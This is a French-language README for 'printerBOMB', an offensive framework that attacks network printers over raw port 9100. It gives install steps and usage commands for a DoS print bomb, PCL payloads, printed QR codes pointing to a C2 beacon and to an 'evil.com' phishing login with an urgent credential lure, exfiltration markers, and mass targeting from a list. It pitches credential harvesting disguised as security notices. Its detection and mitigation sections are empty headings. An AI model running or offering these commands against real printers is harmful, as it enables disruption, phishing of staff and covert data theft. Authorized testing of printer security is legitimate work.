
Framework d'exploitation d'imprimantes pour les tests de sécurité via le port brut 9100, avec livraison de payloads PCL, bombardement DoS, codes QR C2, codes QR de phishing et marqueurs d'exfiltration furtive.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Framework d'Attaque par Spooling d'Imprimante
Exploiter le vecteur d'attaque négligé : vos imprimantes réseau
Développé par : Azhari Ramadhan 🔥
PrintHack est un outil sophistiqué d'exploitation d'imprimantes conçu pour les professionnels de la sécurité, les red teamers et les testeurs d'intrusion. Cet outil exploite le protocole brut de spooling d'imprimante (Port 9100) pour effectuer des évaluations de sécurité, tester les vulnérabilités des imprimantes et simuler des scénarios d'attaque réalistes.
⚠️ AVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité légitimes et à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Traitement d'imagesqrcode - Génération de codes QRrequests - Requêtes HTTPpip install Pillow qrcode requests
# Tester la connectivité de l'imprimante
python3 printerhack.py -t 192.168.1.100 --check
# Envoyer une page de test
python3 printerhack.py -t 192.168.1.100 --test
# Imprimer un message personnalisé
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# Imprimer une image depuis une URL (convertie en ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# Envoyer un payload PCL
python3 printerhack.py -t 192.168.1.100 --pcl
# Bombe d'impression (DoS - 10 Mo)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# Imprimer un code QR de callback C2
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Imprimer un code QR de phishing
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# Imprimer vers plusieurs imprimantes depuis un fichier
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
Imprimer des messages cachés ou des instructions sur des imprimantes compromises dans des scénarios d'accès physique.
Imprimer des codes QR pointant vers des pages de collecte d'identifiants déguisées en avis de sécurité.
Utiliser la sortie d'imprimante comme canal d'exfiltration caché pour des données encodées.
Tester la résilience organisationnelle face aux attaques par déni de service basées sur les imprimantes.
Énumérer et identifier les imprimantes sur le réseau.
Indicateurs de détection :
Stratégies d'atténuation :
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
Les contributions sont les bienvenues ! Veuillez vous assurer :
Développeur : Azhari Ramadhan 🔥
Licence MIT - Voir LICENSE pour plus de détails
🖨️ printerBOMB - Exploiter la dernière ligne de défense
Gardez une longueur d'avance sur les attaquants en pensant comme eux
Fait avec 🔥 par Azhari Ramadhan
| Fonctionnalité | Description |
|---|
--check | Tester la connectivité de l'imprimante |
--test | Envoyer une page de test |
--message | Imprimer des payloads personnalisés |
--image | Imprimer une image depuis une URL (art ASCII) |
--pcl | Envoyer un payload au format PCL |
--bomb | Attaque DoS (payload massif) |
--c2 | Imprimer un code QR de callback C2 |
--phish | Imprimer un code QR de phishing |
--exfil | Imprimer un marqueur d'exfiltration de données |
--file | Impression massive vers plusieurs cibles |